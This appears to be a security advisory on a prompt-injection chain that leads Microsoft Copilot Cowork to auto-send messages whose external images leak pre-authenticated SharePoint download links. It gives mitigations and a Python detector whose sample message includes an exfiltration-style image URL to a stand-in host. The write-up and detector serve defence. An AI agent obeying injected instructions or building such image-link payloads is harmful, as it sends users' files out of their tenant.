Security firm PromptArmor disclosed on May 25, 2026 that Microsoft Copilot Cowork can be tricked into exfiltrating files from a user's tenant through a chained prompt-injection attack. The agent will auto-send a message to the user's own inbox or Teams channel that contains an attacker-controlled image, and opening that message leaks pre-authenticated SharePoint download links. Microsoft has been notified.

What to do today

If your team uses Microsoft 365 Copilot Cowork for proposals, briefs, scripts, or any document automation, ask your SharePoint admin to flip on the block-download policy on the sites that store client work. The cmdlet is documented on Microsoft Learn: Set-SPOSite -Identity <SiteURL> -BlockDownloadPolicy $true. Individual users should also stop letting Copilot auto-approve outbound emails and Teams messages until Microsoft ships a fix. Treat any unexpected email or Teams ping from yourself as suspicious and do not open the images.

Why this matters for creators

Agentic Copilot is being marketed to studios and agencies as a way to draft pitches, summarize storyboards, and route briefs across SharePoint and Teams. That workflow now has an unpatched egress path: any document an attacker can get the agent to read (an inbound brief, a shared PDF, a third-party site indexed by Copilot Search) can carry an injection that forwards your loan estimates, client contracts, or unreleased deliverables out of the tenant. Simon Willison's writeup calls it the inevitable consequence of giving an LLM both Graph API access and unsupervised message-send rights.

Key details

The chain. Three weaknesses combine: agents can send emails and Teams messages to the active user without human confirmation, external images in those messages trigger network requests at the moment of viewing, and the agent can mint pre-authenticated SharePoint download URLs via Microsoft Graph and embed them inside the image source.

Engine. Microsoft Copilot Cowork ships on the same engine as Anthropic's Claude Cowork, which was hit with a near-identical exfiltration vector in January 2026. CU Info Security reports the underlying Files API bug was disclosed to Anthropic in October 2025 and closed as out-of-scope.

Mitigations from PromptArmor. Apply BlockDownloadPolicy per site, gate sensitive libraries behind sensitivity labels, and require human approval for any agent-initiated Email or Teams send.
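A detection check for the chain described above, as an added example that is not code from PromptArmor or Microsoft: it scans a message's HTML body for external images whose URL carries a SharePoint link, the pattern a mail gateway or review script can flag before the message is opened. The tenant host contoso.sharepoint.com, the example.invalid hosts and the sample message are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# Assumption: hosts your clients may load images from (placeholder tenant name).
TRUSTED_IMAGE_HOSTS = {"contoso.sharepoint.com"}

class _ImgCollector(HTMLParser):
    """Collects the src attribute of every <img> tag in a message body."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)

def _fully_unquote(value, rounds=3):
    # Percent-decode repeatedly so double-encoded links are still visible.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_images(html_body, trusted_hosts=TRUSTED_IMAGE_HOSTS):
    """Return (src, reason) for external images whose URL embeds a SharePoint link."""
    parser = _ImgCollector()
    parser.feed(html_body)
    findings = []
    for src in parser.sources:
        parts = urlsplit(src)
        host = (parts.hostname or "").lower()
        # Embedded images (cid:, data:) and trusted hosts are out of scope.
        if parts.scheme not in ("http", "https") or host in trusted_hosts:
            continue
        carried = _fully_unquote(parts.path + "?" + parts.query).lower()
        if "sharepoint.com" in carried:
            findings.append((src, "external image URL embeds a SharePoint link"))
    return findings

# Constructed sample message body; UniqueId is a placeholder, not a real link.
SAMPLE_MESSAGE = """<p>Summary attached.</p>
<img src="cid:logo@contoso">
<img src="https://contoso.sharepoint.com/sites/brand/logo.png">
<img src="https://img.example.invalid/p.png?d=https%3A%2F%2Fcontoso.sharepoint.com%2Fsites%2Fclients%2F_layouts%2F15%2Fdownload.aspx%3FUniqueId%3DPLACEHOLDER">
<img src="https://cdn.example.invalid/banner.png">"""
```

Run it over agent-sent messages addressed to the sender's own mailbox; a hit is a reason to quarantine the message and review which files the agent touched.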

What to do next

Audit which SharePoint sites your Copilot tenant can read and which can mint download links. Walk every team member through disabling the auto-send permission for agent-generated mail and chats. If you handle client deliverables or NDAs through Copilot today, move them to a site with the block-download policy enforced this week.